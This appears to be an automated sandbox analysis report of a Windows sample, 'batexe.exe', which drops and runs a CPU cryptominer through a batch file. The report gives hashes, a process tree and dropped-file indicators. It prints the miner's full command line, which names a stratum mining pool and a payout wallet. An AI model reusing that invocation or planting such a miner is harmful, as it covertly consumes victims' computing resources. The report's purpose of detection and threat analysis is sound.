Analysis
-
max time kernel
296s -
max time network
303s -
platform
windows10-1703_x64 -
resource
win10-20240214-ja -
resource tags
arch:x64arch:x86image:win10-20240214-jalocale:ja-jpos:windows10-1703-x64systemwindows -
submitted
19-02-2024 13:59
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20240214-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20231215-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
pid Process 2320 b2e.exe 3260 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 3260 cpuminer-sse2.exe 3260 cpuminer-sse2.exe 3260 cpuminer-sse2.exe 3260 cpuminer-sse2.exe 3260 cpuminer-sse2.exe -
resource yara_rule behavioral1/memory/4624-5-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 4624 wrote to memory of 2320 4624 batexe.exe 74 PID 4624 wrote to memory of 2320 4624 batexe.exe 74 PID 4624 wrote to memory of 2320 4624 batexe.exe 74 PID 2320 wrote to memory of 2268 2320 b2e.exe 75 PID 2320 wrote to memory of 2268 2320 b2e.exe 75 PID 2320 wrote to memory of 2268 2320 b2e.exe 75 PID 2268 wrote to memory of 3260 2268 cmd.exe 78 PID 2268 wrote to memory of 3260 2268 cmd.exe 78
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4624 -
C:\Users\Admin\AppData\Local\Temp\2045.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\2045.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\2045.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2320 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2556.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:2268 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3260
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3.6MB
MD5a202c43df284047b4026052f2015b382
SHA1531129cc3cff7410080574b0fd1f8404c8c343d6
SHA25622e0189ee48633fcbb780d8ce081c027adcfd289ce6b90e0dddf506b78a59a66
SHA51203192f196ccd2100255c1fad56bd14019876f87509f7215f1af469e93a9e4a8686d7bd18a1273d46e05711d1017a87948b4299a6d4597fa66001b29ee310cea2
-
Filesize
3.8MB
MD57a69624f7316e5fac68a079a6cf60a81
SHA1447571efee607e9f5f76959049bd7c3ae6cf8c08
SHA256b487f8fd1607ad1c71cd1e896f00c0b306f894bc2e0f8bff05496c9b670ed0ba
SHA5120430154ea7c1c9d7aa479ae0bad090e15b009de546085b382b2fa6b4eb8ecc157a7405e56bffa1b860e2dccb7f11e9f7173d018e8b6483982baa3a135c741d93
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
847KB
MD5c98f0bb4e5ce76eb954337fd41ca2202
SHA1706b97b31e884b97e30789b99f1d3236b61eb7c9
SHA256747a7981139a3f04a7d5f6c6999cb20d157fd674e0edb3378e67f2269f52f740
SHA5124be8fb280746ad5120fc65978337f5d8b118717ec131b57b4bbad50ef3d5b183189cbb41f4a41d5c026acc77104f834d108c1221668db9c69d658fc4c4ee7007
-
Filesize
930KB
MD5e857aaa210d6c5fd7215430eb76e2082
SHA133147adc4145dc50a35022d9ae26c9602136754d
SHA2568191ff8efa0e0e76b7381a8f8db85ba11bc27449116a4526a3805d240fdb60cc
SHA5123b1eaae303936b2c9847abc5fc47dda035d39e500a5857cd9a130d0b3bb6b3be047aec474c79035576a5bbb9deff89ae75f5a9c6c5f160008c45c0eca98228fb
-
Filesize
685KB
MD55d6a41bd18e75c8632eff67ba33ca36f
SHA1d551ce8f0ca9e935ccb35241bdb5e723c84196e1
SHA25691ed175595e1c848231662c4d13d1a39c1908b4c0b4de13bb6450b5486b4465c
SHA512c71436b66c81f38f7eef8d99424780f5b6a01c8964ae6f5e8b9ea7fd131522ef48a00b09c323d798bfaf112ccf63550a93839352b79a6dee05509e37366c04f7
-
Filesize
839KB
MD57cfe84ad90f6999473f632f107a7eab3
SHA1eff4353d13dada4bce82ef40b4b72246b5b6e803
SHA256b359f5cb1f0e9a814ab068e0960b6b32e6b9822fdb41f33c3c5e9d4c17f6a580
SHA512a589656f67b6f3a9571edd073709cf037ed600fc3b7146b5d4edd5ccb8f363cc44049cc585707f6d5d54db2a7ea2c7244ec75e94856c6da4ca065986f532f10d
-
Filesize
596KB
MD56199e6477abe9538a35473c25763a8d0
SHA17a04998b24d17d989cc049fe9f89d2f9868d665b
SHA256fd82401a58e59b0c70faa135c3e5d8c6f7f334fcd27e903bfafae227a603f01d
SHA512a035b30a6581f7002c91367e4a97217ed564e9ab336c0c9f404822da50ad13e86f5847891e4c8651464aa8266ff3035eb1d99aebb9de55d0adaa21c399753604
-
Filesize
836KB
MD5aeab40ed9a8e627ea7cefc1f5cf9bf7a
SHA15e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8
SHA256218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9
SHA512c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8
-
Filesize
437KB
MD5971d4146dd3c859b9f59ce4015b93945
SHA14a2fc5bae370ad1c2eaa21b6fa334ff440f8bc32
SHA2563fc1c9dee11ad14ac0c49aedf51330132e2be987efd0acbdfbef12b5dd68122a
SHA512c6dd3a390a0e9297228a535272857c236de188aa846c8a7a754d01c64f5e0857c135325f5cd6bfe155108463b980a6cbc69d42a7eb571bce51d6e64bd482fdeb
-
Filesize
835KB
MD5a5cf56b533e9f5085e8a7bc6cd815096
SHA14b9f6466f8a130a52cc14999f18fc00e6eb3bad6
SHA25654342e027ff00845e7b957ccfb0f580c0054b7d11bd658eaec41a2935873025a
SHA512f9e852e79f26e8b99305c4dba3d5f2bda6045c428fb7709ae4f8f52afeeeedbf0104de8f09475307d7118fa335ea0e65406f0ba4c81077ad9a4d17e04bc42119
-
Filesize
455KB
MD5f9218204ade240b8aa4b422bc46ab188
SHA152f4223e4137b67f198150acc7b8b0414306efb0
SHA256838de060b51807797c729a7e623d6a1e093fcf5aa495bc458bd677e41f73448a
SHA5126d4cb5e23484123163f205f181d3f07f1ebaaf27c8d7f370bfde8bd3d738a9503f127af0cdc6254db7cd07ac0e665f862812c62e82c8e7e29b5e95a612adaae5
-
Filesize
606KB
MD5585efec1bc1d4d916a4402c9875dff75
SHA1d209613666ccac9d0ddab29a3bc59aa00a0968fa
SHA2562f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232
SHA512b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770